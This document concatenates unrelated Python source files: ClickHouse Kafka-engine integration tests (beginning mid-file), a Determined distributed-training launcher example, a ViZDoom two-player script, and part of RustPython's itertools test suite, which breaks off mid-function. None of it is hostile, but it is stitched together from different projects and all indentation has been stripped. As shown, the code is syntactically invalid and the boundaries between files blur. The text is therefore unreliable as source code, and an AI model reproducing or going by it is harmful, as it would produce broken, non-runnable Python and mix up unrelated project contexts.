kafka_produce('commits_of_unprocessed_messages_on_drop', messages)
time.sleep(0.5)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
time.sleep(4)
instance.query('''
DROP TABLE test.kafka SYNC;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10000,
kafka_flush_interval_ms = 1000;
''')
cancel.set()
instance.wait_for_log_line('kafka.*Stalled', repetitions=5)
# kafka_cluster.open_bash_shell('instance')
# SELECT key, _timestamp, _offset FROM test.destination where runningDifference(key) <> 1 ORDER BY key;
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.destination')
print(result)
instance.query('''
DROP TABLE test.kafka_consumer SYNC;
DROP TABLE test.destination SYNC;
''')
kafka_thread.join()
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(i[0] - 1)), 'Missing data!'
@pytest.mark.timeout(120)
def test_bad_reschedule(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(20000)]
kafka_produce('test_bad_reschedule', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000,
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.destination Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
instance.wait_for_log_line("Committed offset 20000")
assert int(instance.query("SELECT max(consume_ts) - min(consume_ts) FROM test.destination")) < 8
@pytest.mark.timeout(300)
def test_kafka_duplicates_when_commit_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce('duplicates_when_commit_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view SYNC;
DROP TABLE IF EXISTS test.consumer SYNC;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'duplicates_when_commit_failed',
kafka_group_name = 'duplicates_when_commit_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 1000;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree()
ORDER BY key;
''')
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.25);
''')
instance.wait_for_log_line("Polled batch of 20 messages")
# the tricky part here is that disconnect should happen after write prefix, but before we do commit
# we have 0.25 (sleepEachRow) * 20 ( Rows ) = 5 sec window after "Polled batch of 20 messages"
# while materialized view is working to inject zookeeper failure
kafka_cluster.pause_container('kafka1')
# if we restore the connection too fast (<30sec) librdkafka will not report any timeout
# (alternative is to decrease the default session timeouts for librdkafka)
#
# when the delay is too long (>50sec) broker will decide to remove us from the consumer group,
# and will start answering "Broker: Unknown member"
instance.wait_for_log_line("Exception during commit attempt: Local: Waiting for coordinator", timeout=45)
instance.wait_for_log_line("All commit attempts failed", look_behind_lines=500)
kafka_cluster.unpause_container('kafka1')
# kafka_cluster.open_bash_shell('instance')
instance.wait_for_log_line("Committed offset 22")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
print(result)
instance.query('''
DROP TABLE test.consumer SYNC;
DROP TABLE test.view SYNC;
''')
# After https://github.com/edenhill/librdkafka/issues/2631
# timeout triggers rebalance, making further commits to the topic after getting back online
# impossible. So we have a duplicate in that scenario, but we report that situation properly.
assert TSV(result) == TSV('42\t22\t22')
# if we came to partition end we will repeat polling until reaching kafka_max_block_size or flush_interval
# that behavior is a bit quesionable - we can just take a bigger pauses between polls instead -
# to do more job in a single pass, and give more rest for a thread.
# But in cases of some peaky loads in kafka topic the current contract sounds more predictable and
# easier to understand, so let's keep it as is for now.
# also we can came to eof because we drained librdkafka internal queue too fast
@pytest.mark.timeout(120)
def test_premature_flush_on_eof(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'premature_flush_on_eof',
kafka_group_name = 'premature_flush_on_eof',
kafka_format = 'JSONEachRow';
SELECT * FROM test.kafka LIMIT 1;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# messages created here will be consumed immedeately after MV creation
# reaching topic EOF.
# But we should not do flush immedeately after reaching EOF, because
# next poll can return more data, and we should respect kafka_flush_interval_ms
# and try to form bigger block
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce('premature_flush_on_eof', messages)
instance.query('''
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
# all subscriptions/assignments done during select, so it start sending data to test.destination
# immediately after creation of MV
instance.wait_for_log_line("Polled batch of 1 messages")
instance.wait_for_log_line("Stalled")
# produce more messages after delay
kafka_produce('premature_flush_on_eof', messages)
# data was not flushed yet (it will be flushed 7.5 sec after creating MV)
assert int(instance.query("SELECT count() FROM test.destination")) == 0
instance.wait_for_log_line("Committed offset 2")
# it should be single part, i.e. single insert
result = instance.query('SELECT _part, count() FROM test.destination group by _part')
assert TSV(result) == TSV('all_1_1_0\t2')
instance.query('''
DROP TABLE test.kafka_consumer;
DROP TABLE test.destination;
''')
@pytest.mark.timeout(120)
def test_kafka_unavailable(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(2000)]
kafka_produce('test_kafka_unavailable', messages)
kafka_cluster.pause_container('kafka1')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_kafka_unavailable',
kafka_group_name = 'test_kafka_unavailable',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000,
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.destination Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
instance.query("SELECT * FROM test.kafka")
instance.wait_for_log_line('brokers are down')
instance.wait_for_log_line('stalled. Reschedule', repetitions=2)
kafka_cluster.unpause_container('kafka1')
instance.wait_for_log_line("Committed offset 2000")
assert int(instance.query("SELECT count() FROM test.destination")) == 2000
time.sleep(5) # needed to give time for kafka client in python test to recovery
@pytest.mark.timeout(180)
def test_kafka_issue14202(kafka_cluster):
"""
INSERT INTO Kafka Engine from an empty SELECT sub query was leading to failure
"""
instance.query('''
CREATE TABLE test.empty_table (
dt Date,
some_string String
)
ENGINE = MergeTree()
PARTITION BY toYYYYMM(dt)
ORDER BY some_string;
CREATE TABLE test.kafka_q (t UInt64, `some_string` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue14202',
kafka_group_name = 'issue14202',
kafka_format = 'JSONEachRow';
''')
time.sleep(3)
instance.query(
'INSERT INTO test.kafka_q SELECT t, some_string FROM ( SELECT dt AS t, some_string FROM test.empty_table )')
# check instance is alive
assert TSV(instance.query('SELECT 1')) == TSV('1')
instance.query('''
DROP TABLE test.empty_table;
DROP TABLE test.kafka_q;
''')
@pytest.mark.timeout(180)
def test_kafka_csv_with_thread_per_consumer(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv',
kafka_group_name = 'csv',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
kafka_num_consumers = 4,
kafka_thread_per_consumer = 1;
''')
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce('csv', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
if __name__ == '__main__':
cluster.start()
input("Cluster created, press any key to destroy...")
cluster.shutdown()
|
4_distributed.py
|
"""
Stage 4: Let's do all the same things, but across multiple workers.
Multi-slot tasks in Determined get the following features out-of-the box:
- batch scheduling
- IP address coordination between workers
- distributed communication primitives
- coordinated cross-worker preemption support
- checkpoint download sharing between workers on the same node
- filter logs by rank in the WebUI
"""
import logging
import pathlib
import queue
import subprocess
import sys
import threading
import time
import determined as det
def save_state(x, steps_completed, trial_id, checkpoint_directory):
with checkpoint_directory.joinpath("state").open("w") as f:
f.write(f"{x},{steps_completed},{trial_id}")
def load_state(trial_id, checkpoint_directory):
checkpoint_directory = pathlib.Path(checkpoint_directory)
with checkpoint_directory.joinpath("state").open("r") as f:
x, steps_completed, ckpt_trial_id = [int(field) for field in f.read().split(",")]
if ckpt_trial_id == trial_id:
return x, steps_completed
else:
return x, 0
def main(core_context, latest_checkpoint, trial_id, increment_by):
x = 0
starting_batch = 0
if latest_checkpoint is not None:
with core_context.checkpoint.restore_path(latest_checkpoint) as path:
x, starting_batch = load_state(trial_id, path)
batch = starting_batch
last_checkpoint_batch = None
for op in core_context.searcher.operations():
while batch < op.length:
# NEW: Increment by the sum of every worker's increment_by value.
# In reality, it is just increment_by*num_workers, but the point is
# to show how to use the communication primitives.
all_increment_bys = core_context.distributed.allgather(increment_by)
x += sum(all_increment_bys)
steps_completed = batch + 1
time.sleep(.1)
# NEW: some logs are easier to read if you only log from the chief.
if core_context.distributed.rank == 0:
logging.info(f"x is now {x}")
if steps_completed % 10 == 0:
# NEW: only the chief may report training metrics and progress,
# or upload checkpoints.
if core_context.distributed.rank == 0:
core_context.train.report_training_metrics(
steps_completed=steps_completed, metrics={"x": x}
)
op.report_progress(steps_completed)
checkpoint_metadata = {"steps_completed": steps_completed}
with core_context.checkpoint.store_path(
checkpoint_metadata
) as (checkpoint_directory, uuid):
save_state(x, steps_completed, trial_id, checkpoint_directory)
last_checkpoint_batch = steps_completed
if core_context.preempt.should_preempt():
return
batch += 1
# NEW: only the chief may report validation metrics and completed operations.
if core_context.distributed.rank == 0:
core_context.train.report_validation_metrics(
steps_completed=steps_completed, metrics={"x": x}
)
op.report_completed(x)
# NEW: again, only the chief may upload checkpoints.
if core_context.distributed.rank == 0 and last_checkpoint_batch != steps_completed:
checkpoint_metadata = {"steps_completed": steps_completed}
with core_context.checkpoint.store_path(checkpoint_metadata) as (path, uuid):
save_state(x, steps_completed, trial_id, path)
# NEW: Launch one process per slot. In many distributed training frameworks, like horovod,
# torch.distributed, or deepspeed, there is a launcher of some sort provided by the framework.
# This example implements a launcher from scratch using subprocess and threading.
def launcher_main(slots_per_node, num_nodes, cross_rank):
# Use subprocess to start one worker process per node.
procs = []
for local_rank in range(slots_per_node):
rank = cross_rank * slots_per_node + local_rank
cmd = [
# Use the determined.launch.wrap_rank to wrap the worker process.
# This ensures logs from each worker can be filtered by rank in the WebUI.
"python3",
"-m",
"determined.launch.wrap_rank",
str(rank),
"--",
# Re-invoke this script but as a worker.
"python3",
__file__,
"worker",
str(rank),
str(local_rank),
]
procs.append(subprocess.Popen(cmd))
# A good launcher normally waits for all workers to finish, but cleans up and exits
# nonzero immediately if any worker fails to prevent distributed training jobs from
# hanging. One way to do this by managing each worker process in a thread and sending
# exit codes over a Queue as workers complete.
q = queue.Queue()
def wait_for_worker(proc):
worker_exit = proc.wait()
q.put((proc, worker_exit))
threads = [threading.Thread(target=wait_for_worker, args=(proc,)) for proc in procs]
for t in threads:
t.start()
first_failed_exit = 0
for i in range(slots_per_node):
proc, worker_exit = q.get()
procs.remove(proc)
if worker_exit != 0 and first_failed_exit == 0:
# When the first worker crashes, preempt the others.
first_failed_exit = worker_exit
for proc in procs:
proc.kill()
for t in threads:
t.join()
return first_failed_exit
# NEW: every worker needs to create a DistributedContext to pass into core.init().
def worker_main(slots_per_node, num_nodes, cross_rank, chief_ip, rank, local_rank):
# In the absence of a distributed training framework that might define the
# rank/local_rank/cross_rank, you can derive them from the ClusterInfo API.
distributed = det.core.DistributedContext(
rank=rank,
size=num_nodes * slots_per_node,
local_rank=local_rank,
local_size=slots_per_node,
cross_rank=cross_rank,
cross_size=num_nodes,
chief_ip=chief_ip,
)
with det.core.init(distributed=distributed) as core_context:
main(
core_context=core_context,
latest_checkpoint=latest_checkpoint,
trial_id=trial_id,
increment_by=hparams["increment_by"],
)
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO, format=det.LOG_FORMAT)
info = det.get_cluster_info()
assert info is not None, "this example only runs on-cluster"
latest_checkpoint = info.latest_checkpoint
trial_id = info.trial.trial_id
hparams = info.trial.hparams
# NEW: gather rank information from the ClusterInfo API.
slots_per_node = len(info.slot_ids)
num_nodes = len(info.container_addrs)
cross_rank = info.container_rank
chief_ip = info.container_addrs[0]
# NEW: This script is invoked both as a launcher-of-workers, and again as each worker.
if sys.argv[1] == "launcher":
# Usage: SCRIPT launcher
exitcode = launcher_main(slots_per_node, num_nodes, cross_rank)
sys.exit(exitcode)
if sys.argv[1] == "worker":
# Usage: SCRIPT worker $RANK $LOCAL_RANK
logging.info(f"worker starting")
rank = int(sys.argv[2])
local_rank = int(sys.argv[3])
exitcode = worker_main(
slots_per_node, num_nodes, cross_rank, chief_ip, rank, local_rank
)
sys.exit(exitcode)
raise ValueError(f"unrecognized first argument: {sys.argv[1]}")
|
multiple_instances.py
|
#!/usr/bin/env python
from __future__ import print_function
from random import choice
from vizdoom import *
# For multiplayer game use process (ZDoom's multiplayer sync mechanism prevents threads to work as expected).
from multiprocessing import Process
# For singleplayer games threads can also be used.
# from threading import Thread
# Run this many episodes
episodes = 10
def player1():
game = DoomGame()
# game.load_config('../config/basic.cfg')
# or
game.load_config('../../scenarios/multi_duel.cfg')
game.add_game_args("-host 2 -deathmatch +timelimit 1.0 +sv_spawnfarthest 1")
game.add_game_args("+name Player1 +colorset 0")
game.init()
actions = [[True, False, False], [False, True, False], [False, False, True]]
for i in range(episodes):
print("Episode #" + str(i + 1))
while not game.is_episode_finished():
if game.is_player_dead():
game.respawn_player()
game.make_action(choice(actions))
print("Episode finished!")
print("Player1 frags:", game.get_game_variable(GameVariable.FRAGCOUNT))
# Starts a new episode. All players have to call new_episode() in multiplayer mode.
game.new_episode()
game.close()
def player2():
game = DoomGame()
# game.load_config('../config/basic.cfg')
# or
game.load_config('../../scenarios/multi_duel.cfg')
game.add_game_args("-join 127.0.0.1")
game.add_game_args("+name Player2 +colorset 3")
game.init()
actions = [[True, False, False], [False, True, False], [False, False, True]]
for i in range(episodes):
while not game.is_episode_finished():
if game.is_player_dead():
game.respawn_player()
game.make_action(choice(actions))
print("Player2 frags:", game.get_game_variable(GameVariable.FRAGCOUNT))
game.new_episode()
game.close()
# p1 = Thread(target = player1)
# p1.start()
if __name__ == '__main__':
p1 = Process(target=player1)
p1.start()
player2()
|
test_itertools.py
|
import unittest
from test import support
from itertools import *
import weakref
from decimal import Decimal
from fractions import Fraction
import operator
import random
import copy
import pickle
from functools import reduce
import sys
import struct
import threading
maxsize = support.MAX_Py_ssize_t
minsize = -maxsize-1
def lzip(*args):
return list(zip(*args))
def onearg(x):
'Test function of one argument'
return 2*x
def errfunc(*args):
'Test function that raises an error'
raise ValueError
def gen3():
'Non-restartable source sequence'
for i in (0, 1, 2):
yield i
def isEven(x):
'Test predicate'
return x%2==0
def isOdd(x):
'Test predicate'
return x%2==1
def tupleize(*args):
return args
def irange(n):
for i in range(n):
yield i
class StopNow:
'Class emulating an empty iterable.'
def __iter__(self):
return self
def __next__(self):
raise StopIteration
def take(n, seq):
'Convenience function for partially consuming a long of infinite iterable'
return list(islice(seq, n))
def prod(iterable):
return reduce(operator.mul, iterable, 1)
def fact(n):
'Factorial'
return prod(range(1, n+1))
# root level methods for pickling ability
def testR(r):
return r[0]
def testR2(r):
return r[2]
def underten(x):
return x<10
picklecopiers = [lambda s, proto=proto: pickle.loads(pickle.dumps(s, proto))
for proto in range(pickle.HIGHEST_PROTOCOL + 1)]
class TestBasicOps(unittest.TestCase):
def pickletest(self, protocol, it, stop=4, take=1, compare=None):
"""Test that an iterator is the same after pickling, also when part-consumed"""
def expand(it, i=0):
# Recursively expand iterables, within sensible bounds
if i > 10:
raise RuntimeError("infinite recursion encountered")
if isinstance(it, str):
return it
try:
l = list(islice(it, stop))
except TypeError:
return it # can't expand it
return [expand(e, i+1) for e in l]
# Test the initial copy against the original
dump = pickle.dumps(it, protocol)
i2 = pickle.loads(dump)
self.assertEqual(type(it), type(i2))
a, b = expand(it), expand(i2)
self.assertEqual(a, b)
if compare:
c = expand(compare)
self.assertEqual(a, c)
# Take from the copy, and create another copy and compare them.
i3 = pickle.loads(dump)
took = 0
try:
for i in range(take):
next(i3)
took += 1
except StopIteration:
pass #in case there is less data than 'take'
dump = pickle.dumps(i3, protocol)
i4 = pickle.loads(dump)
a, b = expand(i3), expand(i4)
self.assertEqual(a, b)
if compare:
c = expand(compare[took:])
self.assertEqual(a, c);
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_accumulate(self):
self.assertEqual(list(accumulate(range(10))), # one positional arg
[0, 1, 3, 6, 10, 15, 21, 28, 36, 45])
self.assertEqual(list(accumulate(iterable=range(10))), # kw arg
[0, 1, 3, 6, 10, 15, 21, 28, 36, 45])
for typ in int, complex, Decimal, Fraction: # multiple types
self.assertEqual(
list(accumulate(map(typ, range(10)))),
list(map(typ, [0, 1, 3, 6, 10, 15, 21, 28, 36, 45])))
self.assertEqual(list(accumulate('abc')), ['a', 'ab', 'abc']) # works with non-numeric
self.assertEqual(list(accumulate([])), []) # empty iterable
self.assertEqual(list(accumulate([7])), [7]) # iterable of length one
self.assertRaises(TypeError, accumulate, range(10), 5, 6) # too many args
self.assertRaises(TypeError, accumulate) # too few args
self.assertRaises(TypeError, accumulate, x=range(10)) # unexpected kwd arg
self.assertRaises(TypeError, list, accumulate([1, []])) # args that don't add
s = [2, 8, 9, 5, 7, 0, 3, 4, 1, 6]
self.assertEqual(list(accumulate(s, min)),
[2, 2, 2, 2, 2, 0, 0, 0, 0, 0])
self.assertEqual(list(accumulate(s, max)),
[2, 8, 9, 9, 9, 9, 9, 9, 9, 9])
self.assertEqual(list(accumulate(s, operator.mul)),
[2, 16, 144, 720, 5040, 0, 0, 0, 0, 0])
with self.assertRaises(TypeError):
list(accumulate(s, chr)) # unary-operation
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, accumulate(range(10))) # test pickling
self.pickletest(proto, accumulate(range(10), initial=7))
self.assertEqual(list(accumulate([10, 5, 1], initial=None)), [10, 15, 16])
self.assertEqual(list(accumulate([10, 5, 1], initial=100)), [100, 110, 115, 116])
self.assertEqual(list(accumulate([], initial=100)), [100])
with self.assertRaises(TypeError):
list(accumulate([10, 20], 100))
def test_chain(self):
def chain2(*iterables):
'Pure python version in the docs'
for it in iterables:
for element in it:
yield element
for c in (chain, chain2):
self.assertEqual(list(c('abc', 'def')), list('abcdef'))
self.assertEqual(list(c('abc')), list('abc'))
self.assertEqual(list(c('')), [])
self.assertEqual(take(4, c('abc', 'def')), list('abcd'))
self.assertRaises(TypeError, list,c(2, 3))
def test_chain_from_iterable(self):
self.assertEqual(list(chain.from_iterable(['abc', 'def'])), list('abcdef'))
self.assertEqual(list(chain.from_iterable(['abc'])), list('abc'))
self.assertEqual(list(chain.from_iterable([''])), [])
self.assertEqual(take(4, chain.from_iterable(['abc', 'def'])), list('abcd'))
self.assertRaises(TypeError, list, chain.from_iterable([2, 3]))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_chain_reducible(self):
for oper in [copy.deepcopy] + picklecopiers:
it = chain('abc', 'def')
self.assertEqual(list(oper(it)), list('abcdef'))
self.assertEqual(next(it), 'a')
self.assertEqual(list(oper(it)), list('bcdef'))
self.assertEqual(list(oper(chain(''))), [])
self.assertEqual(take(4, oper(chain('abc', 'def'))), list('abcd'))
self.assertRaises(TypeError, list, oper(chain(2, 3)))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, chain('abc', 'def'), compare=list('abcdef'))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_chain_setstate(self):
self.assertRaises(TypeError, chain().__setstate__, ())
self.assertRaises(TypeError, chain().__setstate__, [])
self.assertRaises(TypeError, chain().__setstate__, 0)
self.assertRaises(TypeError, chain().__setstate__, ([],))
self.assertRaises(TypeError, chain().__setstate__, (iter([]), []))
it = chain()
it.__setstate__((iter(['abc', 'def']),))
self.assertEqual(list(it), ['a', 'b', 'c', 'd', 'e', 'f'])
it = chain()
it.__setstate__((iter(['abc', 'def']), iter(['ghi'])))
self.assertEqual(list(it), ['ghi', 'a', 'b', 'c', 'd', 'e', 'f'])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_combinations(self):
self.assertRaises(TypeError, combinations, 'abc') # missing r argument
self.assertRaises(TypeError, combinations, 'abc', 2, 1) # too many arguments
self.assertRaises(TypeError, combinations, None) # pool is not iterable
self.assertRaises(ValueError, combinations, 'abc', -2) # r is negative
for op in [lambda a:a] + picklecopiers:
self.assertEqual(list(op(combinations('abc', 32))), []) # r > n
self.assertEqual(list(op(combinations('ABCD', 2))),
[('A','B'), ('A','C'), ('A','D'), ('B','C'), ('B','D'), ('C','D')])
testIntermediate = combinations('ABCD', 2)
next(testIntermediate)
self.assertEqual(list(op(testIntermediate)),
[('A','C'), ('A','D'), ('B','C'), ('B','D'), ('C','D')])
self.assertEqual(list(op(combinations(range(4), 3))),
[(0,1,2), (0,1,3), (0,2,3), (1,2,3)])
testIntermediate = combinations(range(4), 3)
next(testIntermediate)
self.assertEqual(list(op(testIntermediate)),
[(0,1,3), (0,2,3), (1,2,3)])
def combinations1(iterable, r):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
if r > n:
return
indices = list(range(r))
yield tuple(pool[i] for i in indices)
while 1:
for i in reversed(range(r)):
if indices[i] != i + n - r:
break
else:
return
indices[i] += 1
for j in range(i+1, r):
indices[j] = indices[j-1] + 1
yield tuple(pool[i] for i in indices)
def combinations2(iterable, r):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
for indices in permutations(range(n), r):
if sorted(indices) == list(indices):
yield tuple(pool[i] for i in indices)
def combinations3(iterable, r):
'Pure python version from cwr()'
pool = tuple(iterable)
n = len(pool)
for indices in combinations_with_replacement(range(n), r):
if len(set(indices)) == r:
yield tuple(pool[i] for i in indices)
for n in range(7):
values = [5*x-12 for x in range(n)]
for r in range(n+2):
result = list(combinations(values, r))
self.assertEqual(len(result), 0 if r>n else fact(n) / fact(r) / fact(n-r)) # right number of combs
self.assertEqual(len(result), len(set(result))) # no repeats
self.assertEqual(result, sorted(result)) # lexicographic order
for c in result:
self.assertEqual(len(c), r) # r-length combinations
self.assertEqual(len(set(c)), r) # no duplicate elements
self.assertEqual(list(c), sorted(c)) # keep original ordering
self.assertTrue(all(e in values for e in c)) # elements taken from input iterable
self.assertEqual(list(c),
[e for e in values if e in c]) # comb is a subsequence of the input iterable
self.assertEqual(result, list(combinations1(values, r))) # matches first pure python version
self.assertEqual(result, list(combinations2(values, r))) # matches second pure python version
self.assertEqual(result, list(combinations3(values, r))) # matches second pure python version
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, combinations(values, r)) # test pickling
@support.bigaddrspacetest
def test_combinations_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
combinations("AA", 2**29)
# Test implementation detail: tuple re-use
@support.impl_detail("tuple reuse is specific to CPython")
def test_combinations_tuple_reuse(self):
self.assertEqual(len(set(map(id, combinations('abcde', 3)))), 1)
self.assertNotEqual(len(set(map(id, list(combinations('abcde', 3))))), 1)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_combinations_with_replacement(self):
cwr = combinations_with_replacement
self.assertRaises(TypeError, cwr, 'abc') # missing r argument
self.assertRaises(TypeError, cwr, 'abc', 2, 1) # too many arguments
self.assertRaises(TypeError, cwr, None) # pool is not iterable
self.assertRaises(ValueError, cwr, 'abc', -2) # r is negative
for op in [lambda a:a] + picklecopiers:
self.assertEqual(list(op(cwr('ABC', 2))),
[('A','A'), ('A','B'), ('A','C'), ('B','B'), ('B','C'), ('C','C')])
testIntermediate = cwr('ABC', 2)
next(testIntermediate)
self.assertEqual(list(op(testIntermediate)),
[('A','B'), ('A','C'), ('B','B'), ('B','C'), ('C','C')])
def cwr1(iterable, r):
'Pure python version shown in the docs'
# number items returned: (n+r-1)! / r! / (n-1)! when n>0
pool = tuple(iterable)
n = len(pool)
if not n and r:
return
indices = [0] * r
yield tuple(pool[i] for i in indices)
while 1:
for i in reversed(range(r)):
if indices[i] != n - 1:
break
else:
return
indices[i:] = [indices[i] + 1] * (r - i)
yield tuple(pool[i] for i in indices)
def cwr2(iterable, r):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
for indices in product(range(n), repeat=r):
if sorted(indices) == list(indices):
yield tuple(pool[i] for i in indices)
def numcombs(n, r):
if not n:
return 0 if r else 1
return fact(n+r-1) / fact(r)/ fact(n-1)
for n in range(7):
values = [5*x-12 for x in range(n)]
for r in range(n+2):
result = list(cwr(values, r))
self.assertEqual(len(result), numcombs(n, r)) # right number of combs
self.assertEqual(len(result), len(set(result))) # no repeats
self.assertEqual(result, sorted(result)) # lexicographic order
regular_combs = list(combinations(values, r)) # compare to combs without replacement
if n == 0 or r <= 1:
self.assertEqual(result, regular_combs) # cases that should be identical
else:
self.assertTrue(set(result) >= set(regular_combs)) # rest should be supersets of regular combs
for c in result:
self.assertEqual(len(c), r) # r-length combinations
noruns = [k for k,v in groupby(c)] # combo without consecutive repeats
self.assertEqual(len(noruns), len(set(noruns))) # no repeats other than consecutive
self.assertEqual(list(c), sorted(c)) # keep original ordering
self.assertTrue(all(e in values for e in c)) # elements taken from input iterable
self.assertEqual(noruns,
[e for e in values if e in c]) # comb is a subsequence of the input iterable
self.assertEqual(result, list(cwr1(values, r))) # matches first pure python version
self.assertEqual(result, list(cwr2(values, r))) # matches second pure python version
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, cwr(values,r)) # test pickling
@support.bigaddrspacetest
def test_combinations_with_replacement_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
combinations_with_replacement("AA", 2**30)
# Test implementation detail: tuple re-use
@support.impl_detail("tuple reuse is specific to CPython")
def test_combinations_with_replacement_tuple_reuse(self):
cwr = combinations_with_replacement
self.assertEqual(len(set(map(id, cwr('abcde', 3)))), 1)
self.assertNotEqual(len(set(map(id, list(cwr('abcde', 3))))), 1)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_permutations(self):
self.assertRaises(TypeError, permutations) # too few arguments
self.assertRaises(TypeError, permutations, 'abc', 2, 1) # too many arguments
self.assertRaises(TypeError, permutations, None) # pool is not iterable
self.assertRaises(ValueError, permutations, 'abc', -2) # r is negative
self.assertEqual(list(permutations('abc', 32)), []) # r > n
self.assertRaises(TypeError, permutations, 'abc', 's') # r is not an int or None
self.assertEqual(list(permutations(range(3), 2)),
[(0,1), (0,2), (1,0), (1,2), (2,0), (2,1)])
def permutations1(iterable, r=None):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
r = n if r is None else r
if r > n:
return
indices = list(range(n))
cycles = list(range(n-r+1, n+1))[::-1]
yield tuple(pool[i] for i in indices[:r])
while n:
for i in reversed(range(r)):
cycles[i] -= 1
if cycles[i] == 0:
indices[i:] = indices[i+1:] + indices[i:i+1]
cycles[i] = n - i
else:
j = cycles[i]
indices[i], indices[-j] = indices[-j], indices[i]
yield tuple(pool[i] for i in indices[:r])
break
else:
return
def permutations2(iterable, r=None):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
r = n if r is None else r
for indices in product(range(n), repeat=r):
if len(set(indices)) == r:
yield tuple(pool[i] for i in indices)
for n in range(7):
values = [5*x-12 for x in range(n)]
for r in range(n+2):
result = list(permutations(values, r))
self.assertEqual(len(result), 0 if r>n else fact(n) / fact(n-r)) # right number of perms
self.assertEqual(len(result), len(set(result))) # no repeats
self.assertEqual(result, sorted(result)) # lexicographic order
for p in result:
self.assertEqual(len(p), r) # r-length permutations
self.assertEqual(len(set(p)), r) # no duplicate elements
self.assertTrue(all(e in values for e in p)) # elements taken from input iterable
self.assertEqual(result, list(permutations1(values, r))) # matches first pure python version
self.assertEqual(result, list(permutations2(values, r))) # matches second pure python version
if r == n:
self.assertEqual(result, list(permutations(values, None))) # test r as None
self.assertEqual(result, list(permutations(values))) # test default r
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, permutations(values, r)) # test pickling
@support.bigaddrspacetest
def test_permutations_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
permutations("A", 2**30)
@support.impl_detail("tuple reuse is specific to CPython")
def test_permutations_tuple_reuse(self):
self.assertEqual(len(set(map(id, permutations('abcde', 3)))), 1)
self.assertNotEqual(len(set(map(id, list(permutations('abcde', 3))))), 1)
def test_combinatorics(self):
# Test relationships between product(), permutations(),
# combinations() and combinations_with_replacement().
for n in range(6):
s = 'ABCDEFG'[:n]
for r in range(8):
prod = list(product(s, repeat=r))
cwr = list(combinations_with_replacement(s, r))
perm = list(permutations(s, r))
